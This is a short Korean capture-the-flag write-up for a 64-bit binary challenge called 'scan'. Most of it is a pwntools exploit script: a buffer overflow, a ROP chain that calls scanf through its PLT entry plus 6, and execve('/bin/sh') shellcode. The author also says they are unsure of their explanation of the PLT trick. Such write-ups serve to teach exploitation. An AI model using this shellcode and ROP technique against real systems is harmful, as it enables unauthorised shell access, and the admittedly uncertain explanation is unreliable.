[DIMI] scan

64bit scanf 를 사용한 문제였다.

asis 에 Mrs. Hudson였던가 그문제랑 유사했다.

from pwn import *

p = process("./scan")

s = 0x4005E4

scanf = 0x400430

data = 0x0000000000601028

poprdi = 0x4005c3

popsdi_r15 = 0x00000000004005c1

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

pay = "A"*112

pay += "B"*8

pay += p64(poprdi) + p64(s)

pay += p64(popsdi_r15) + p64(data) + p64(data)

pay += p64(scanf+6)

pay += p64(data)

p.sendline(pay)

p.sendline(shellcode)

p.interactive()

여기서 왜 scanf@plt 가 아닌 scanf@plt + 6을 호출하냐면, scanf@plt 주소의 마지막부분인 (여기서는 0x30) 이 널이 되버린다.

그래서 scanf@plt + 6 부분에있는 dynamic_linker 쪽을 호출해서 실 함수주소를 구해내는 형태로 콜하는거다.

라고 알고있는데 확실하지는 않다....ㅎㅎ